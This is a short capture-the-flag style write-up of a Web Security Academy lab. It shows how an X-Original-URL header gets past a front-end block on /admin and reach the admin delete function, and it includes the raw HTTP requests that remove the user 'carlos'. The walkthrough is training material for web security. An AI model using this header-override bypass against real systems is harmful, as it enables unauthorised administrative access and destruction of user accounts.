URL-based access control can be circumvented

This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.

Attempting to access /admin resulted in being blocked. Notably, the response appeared straightforward, hinting at a front-end system origin. To investigate further, I sent the request to Burp Repeater. Modifying the URL to / and introducing the HTTP header X-Original-URL: /example yielded a "not found" response, indicating back-end system processing of the X-Original-URL header.

GET / HTTP/2
Host: ****.web-security-academy.net
X-Original-Url: /example

The Response was like:

HTTP/2 404 Not Found
Content-Type: application/json; charset=utf-8
Set-Cookie: session=****; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 11

"Not Found"

Continuing, I adjusted the X-Original-URL header value to /admin, enabling access to the admin page. To initiate the deletion of "carlos," I appended ?username=carlos to the actual query string and altered the X-Original-URL path to /admin/delete. This sequence of steps allowed for successful navigation through the security measures and accomplished the task of deleting the user "carlos" and that's how the lab is solved.

GET /?username=carlos HTTP/2
Host: ****.web-security-academy.net
X-Original-Url: /admin/delete

PreviousInsecure direct object references NextMethod-based access control can be circumvented

Last updated 1 year ago